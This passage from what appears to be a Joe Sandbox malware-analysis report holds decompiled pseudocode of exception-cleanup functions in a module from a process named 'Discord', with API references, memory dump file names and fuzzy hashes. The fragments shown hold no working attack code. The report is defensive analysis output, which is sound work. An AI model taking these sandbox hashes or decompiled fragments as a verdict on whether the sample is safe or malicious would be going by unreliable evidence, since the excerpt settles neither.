					L6DE8EBA0();
					_t17 = _t16;
				}
			}

0x6de83b2e
0x6de83b23
0x6de83b26
0x6de83b2b
0x6de83aca
0x6de83ad9
0x6de83adc
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ac8

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE83B26

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 0f678e7981d8f235cf76ef56de2afc052077338d86e4d6ff664e9349b504b2ef
Instruction ID: 5c3339191f4ca809b1d181fa422339d0540e05e9ad475d26cbd5d87c99cb0ecf
Opcode Fuzzy Hash: 0f678e7981d8f235cf76ef56de2afc052077338d86e4d6ff664e9349b504b2ef
Instruction Fuzzy Hash: C0F03A74A5960A8FCB10DF24C898B6CF3F4FF54218F1188DDD549E7242EA305A858F01

Uniqueness

Uniqueness Score: -1.00%

Function 6DE89FBE Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE89FBE() {
				intOrPtr _t9;
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t15 = _t9;
				while(1) {
					 *_t21 = _t19;
					L6DE8DD48();
					_t22 = _t21 - 4;
					_t12 = _t20 - 0x37;
					 *_t22 = _t12;
					L6DE8DD48();
					_t23 = _t22 - 4;
					 *_t23 = _t15;
					L6DE8EBA0();
					_t15 = _t12;
					 *_t23 =  *((intOrPtr*)(_t20 - 0x3c));
					L6DE8DD48();
					_t21 = _t23 - 4;
				}
			}

0x6de89fbe
0x6de89f79
0x6de89f7c
0x6de89f82
0x6de89f87
0x6de89f90
0x6de89f93
0x6de89f96
0x6de89f9b
0x6de89f9e
0x6de89fa1
0x6de89fa6
0x6de89fb1
0x6de89fb4
0x6de89fb9
0x6de89fb9

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F82
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F96
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE89FA1
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89FB4

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: a2c316f2955cbe7a1afe957a4fc52079cc88a6ce910f176024cf607227410554
Instruction ID: 0a29591d7796d649d8b3bba582dedcfaf2115666a46407dbbcd855455bb24d97
Opcode Fuzzy Hash: a2c316f2955cbe7a1afe957a4fc52079cc88a6ce910f176024cf607227410554
Instruction Fuzzy Hash: 79F01CB8E096499FCF05EFB8D59849CF7F0AF48318F11452ED9469B251EB30AA49CB02

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8A02D Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE8A02D() {
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t15 = _t9;
				while(1) {
					_t11 = _t20 - 0x37;
					 *_t21 = _t11;
					L6DE8DD48();
					_t22 = _t21 - 4;
					 *_t22 = _t15;
					L6DE8EBA0();
					_t15 = _t11;
					 *_t22 =  *((intOrPtr*)(_t20 - 0x3c));
					L6DE8DD48();
					_t23 = _t22 - 4;
					 *_t23 = _t19;
					L6DE8DD48();
					_t21 = _t23 - 4;
				}
			}

0x6de8a02d
0x6de89f8a
0x6de89f90
0x6de89f93
0x6de89f96
0x6de89f9b
0x6de89f9e
0x6de89fa1
0x6de89fa6
0x6de89fb1
0x6de89fb4
0x6de89fb9
0x6de89f7c
0x6de89f82
0x6de89f87
0x6de89f87

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F82
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F96
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE89FA1
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89FB4

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 8f5d37d1c6e31c1a5fda2de6978baeb3b0915400ad42c6f798bf125a8b1921ad
Instruction ID: 90fe0321977adc2224b468353f1829ccb89619076b2bee93e8505c640e183c61
Opcode Fuzzy Hash: 8f5d37d1c6e31c1a5fda2de6978baeb3b0915400ad42c6f798bf125a8b1921ad
Instruction Fuzzy Hash: B4F01274D055058FCF05EF74D59849CF7F0AF45218F11452ED94697251EB30A949CB02

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B47 Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6DE83B47() {
				intOrPtr _t9;
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t22;
				intOrPtr* _t23;

				_t15 = _t9;
				 *_t23 = _t21;
				L6DE8DD48();
				while(1) {
					_t12 = _t22 - 0xe3;
					 *_t23 = _t12;
					L6DE8DD48();
					_push(_t12);
					 *_t23 = _t15;
					L6DE8EBA0();
					_t15 = _t12;
					 *_t23 =  *((intOrPtr*)(_t22 - 0xf0));
					L6DE8DD48();
				}
			}

0x6de83b47
0x6de83a9c
0x6de83aa2
0x6de83aa8
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ae1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE83AA2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 262beb2c981960595fdf7ffcc961600d1b6fd1fe47b6e2ad015c21b1f31db034
Instruction ID: ec2495cab9bd4be02b53af038330cc3cf6663eafd217f7bfaa5e777a4a03854b
Opcode Fuzzy Hash: 262beb2c981960595fdf7ffcc961600d1b6fd1fe47b6e2ad015c21b1f31db034
Instruction Fuzzy Hash: BAF01C74948A168FCB10EF24C888B5CF7F8FF94214F11889DD54AE7252EB305A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83AE4 Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DE83AE4() {
				intOrPtr _t9;
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t20;
				void* _t21;
				intOrPtr* _t22;

				_t15 = _t9;
				 *_t22 = _t20;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t21 - 0xc8)));
				while(1) {
					_t12 = _t21 - 0xe3;
					 *_t22 = _t12;
					L6DE8DD48();
					_push(_t12);
					 *_t22 = _t15;
					L6DE8EBA0();
					_t15 = _t12;
					 *_t22 =  *((intOrPtr*)(_t21 - 0xf0));
					L6DE8DD48();
				}
			}

0x6de83ae4
0x6de83aec
0x6de83af2
0x6de83af7
0x6de83aa8
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ae1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE83AF2

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 799e470c638091ae7b2746301fc1b818f6b989a8b3e5eb1270e030e95b35b892
Instruction ID: ecc3dddd9740a26705d29399e2517ba340b871077e35a8c443c1838f1a19d57c
Opcode Fuzzy Hash: 799e470c638091ae7b2746301fc1b818f6b989a8b3e5eb1270e030e95b35b892
Instruction Fuzzy Hash: 8FF0F874949A169FCB10EF24C888A5CB7F8BF98214F11899DD54AE7242EB305A858F01

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BD4B Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DE8BD4B() {
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				intOrPtr* _t20;

				_t12 = _t8;
				_t18 = _t19 - 0x17d;
				while(1) {
					 *_t20 = _t18;
					_t17 = _t19 - 0x17c;
					L6DE8DD48();
					_t10 = E6DE942E0(_t17);
					 *_t20 = _t12;
					L6DE8EBA0();
					_t12 = _t10;
					_t18 = _t19 - 0x17d;
					 *_t20 = _t18;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t19 - 0xc4)) - 0xc);
				}
			}

0x6de8bd4b
0x6de8bd4d
0x6de8bd1a
0x6de8bd20
0x6de8bd23
0x6de8bd2c
0x6de8bd34
0x6de8bd39
0x6de8bd3c
0x6de8bd41
0x6de8bd43
0x6de8bd0e
0x6de8bd14
0x6de8bd19
0x6de8bd19

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD14
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD2C
_ZN7config1D1Ev.DPUB1 ref: 6DE8BD34
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8BD3C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$N7config1ResumeUnwind_
String ID:
API String ID: 520181850-0
Opcode ID: 695ff7bb94504b595bd2687afd96b195c1f6f0ef6a6f60c49d440735c8342881
Instruction ID: 7df6b45ab8d49e5fb98d713b3c3ead5eb2b269329e657f6bf95f1fc4d17afb5f
Opcode Fuzzy Hash: 695ff7bb94504b595bd2687afd96b195c1f6f0ef6a6f60c49d440735c8342881
Instruction Fuzzy Hash: C5E030719085288BCB159F64DC806EDB3F0AF84304F12468DD64D77241CF302E41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BD55 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DE8BD55() {
				intOrPtr _t8;
				intOrPtr _t9;
				intOrPtr _t12;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				intOrPtr* _t20;

				_t12 = _t8;
				_t17 = _t19 - 0x17c;
				while(1) {
					_t9 = E6DE942E0(_t17);
					 *_t20 = _t12;
					L6DE8EBA0();
					_t12 = _t9;
					_t18 = _t19 - 0x17d;
					 *_t20 = _t18;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t19 - 0xc4)) - 0xc);
					 *_t20 = _t18;
					_t17 = _t19 - 0x17c;
					L6DE8DD48();
				}
			}

0x6de8bd55
0x6de8bd57
0x6de8bd32
0x6de8bd34
0x6de8bd39
0x6de8bd3c
0x6de8bd41
0x6de8bd43
0x6de8bd0e
0x6de8bd14
0x6de8bd19
0x6de8bd20
0x6de8bd23
0x6de8bd2c
0x6de8bd31

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD14
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD2C
_ZN7config1D1Ev.DPUB1 ref: 6DE8BD34
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8BD3C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$N7config1ResumeUnwind_
String ID:
API String ID: 520181850-0
Opcode ID: 6732aa88b1dd12ad803cdb5f9ebd27f0e0396f3169ac04fb99f5d5b8e14b7081
Instruction ID: 94dc1360ae49293f45854c88f742ab325b551d19f9e0fd170e9a13620d308409
Opcode Fuzzy Hash: 6732aa88b1dd12ad803cdb5f9ebd27f0e0396f3169ac04fb99f5d5b8e14b7081
Instruction Fuzzy Hash: 4FE030719485148BC7159B64D8806EDB3F1AF89304F12858DD14D7B252DF302E41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8DBF6 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE8DBF6() {
				intOrPtr _t8;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t20;

				_t17 = _t8;
				_t12 = _t18 - 0x24;
				 *_t19 = _t12;
				L6DE8DD48();
				_t20 = _t19 - 4;
				while(1) {
					 *_t20 = _t12;
					_t13 = _t17;
					L6DE8DD48();
					_t20 = _t20 - 4;
					_t11 = E6DE94F70(_t18 - 0x28);
					 *_t20 = _t13;
					L6DE8EBA0();
					_t12 = _t18 - 0x24;
					_t17 = _t11;
				}
			}

0x6de8dbf6
0x6de8dbfb
0x6de8dbfe
0x6de8dc04
0x6de8dc09
0x6de8dbe1
0x6de8dbe4
0x6de8dbe7
0x6de8dbec
0x6de8dbf1
0x6de8dbcf
0x6de8dbd4
0x6de8dbd7
0x6de8dbdc
0x6de8dbdf
0x6de8dbdf

APIs

_ZNSt6threadD1Ev.DPUB1 ref: 6DE8DBCF

Part of subcall function 6DE94F70: pthread_equal.LIBWINPTHREAD-1 ref: 6DE94F80

_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8DBD7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8DBEC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8DC04

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeSt6threadUnwind_pthread_equal
String ID:
API String ID: 2155883033-0
Opcode ID: 324268701dfbe3c2d4f5d8bd8df822c3860e5f55bef7d063b3882d9cdb8ca75c
Instruction ID: 9885cc4864443e2edab4b023b32cd35f1bfbe8e8e33dce635b58ee01b5a09b96
Opcode Fuzzy Hash: 324268701dfbe3c2d4f5d8bd8df822c3860e5f55bef7d063b3882d9cdb8ca75c
Instruction Fuzzy Hash: A9E092798085048FCB01EF68D5D44DCF7F0BF48268F22456EC846A7211EF302E09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE942C6 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DE942C6() {
				intOrPtr _t58;
				intOrPtr _t60;
				void* _t87;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr* _t121;

				_t119 = _t58;
				while(1) {
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x10)) - 0xc);
					_t60 =  *((intOrPtr*)(_t87 + 0xc));
					 *_t121 = _t120;
					L6DE8DD48();
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t60);
					 *_t121 = _t119;
					L6DE8EBA0();
					_t119 = _t60;
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x78)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x74)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x70)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x68)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x64)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x60)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x5c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x58)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x54)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x50)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x48)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x44)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x40)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x3c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x38)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x34)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x30)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x28)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x24)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x20)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x1c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x18)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x14)));
				}
			}

0x6de942c6
0x6de941db
0x6de941de
0x6de941e4
0x6de941e9
0x6de941ea
0x6de941ed
0x6de941f3
0x6de941fc
0x6de94202
0x6de94207
0x6de94208
0x6de9420b
0x6de94210
0x6de94058
0x6de9405e
0x6de94063
0x6de94067
0x6de9406d
0x6de94072
0x6de94076
0x6de9407c
0x6de94081
0x6de94085
0x6de9408b
0x6de94090
0x6de94094
0x6de9409a
0x6de9409f
0x6de940a3
0x6de940a9
0x6de940ae
0x6de940b2
0x6de940b8
0x6de940bd
0x6de940c1
0x6de940c7
0x6de940cc
0x6de940d0
0x6de940d6
0x6de940db
0x6de940df
0x6de940e5
0x6de940ea
0x6de940ee
0x6de940f4
0x6de940f9
0x6de940fd
0x6de94103
0x6de94108
0x6de9410c
0x6de94112
0x6de94117
0x6de9411b
0x6de94121
0x6de94126
0x6de9412a
0x6de94130
0x6de94135
0x6de94139
0x6de9413f
0x6de94144
0x6de94148
0x6de9414e
0x6de94153
0x6de94157
0x6de9415d
0x6de94162
0x6de94166
0x6de9416c
0x6de94171
0x6de94175
0x6de9417b
0x6de94180
0x6de94184
0x6de9418a
0x6de9418f
0x6de94193
0x6de94199
0x6de9419e
0x6de941a2
0x6de941a8
0x6de941ad
0x6de941b1
0x6de941b7
0x6de941bc
0x6de941c0
0x6de941c6
0x6de941cb
0x6de941cf
0x6de941d5
0x6de941da
0x6de941da

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941E4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941F3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE94202
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE9420B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 89d2fa84313eec4fe24842cce2c5938948358e3e05e63ce52319879418d0552d
Instruction ID: 8d590dd90e08d10c353fb5381bc020aec73aa48a42731f5dd4a4dfa79ebd537f
Opcode Fuzzy Hash: 89d2fa84313eec4fe24842cce2c5938948358e3e05e63ce52319879418d0552d
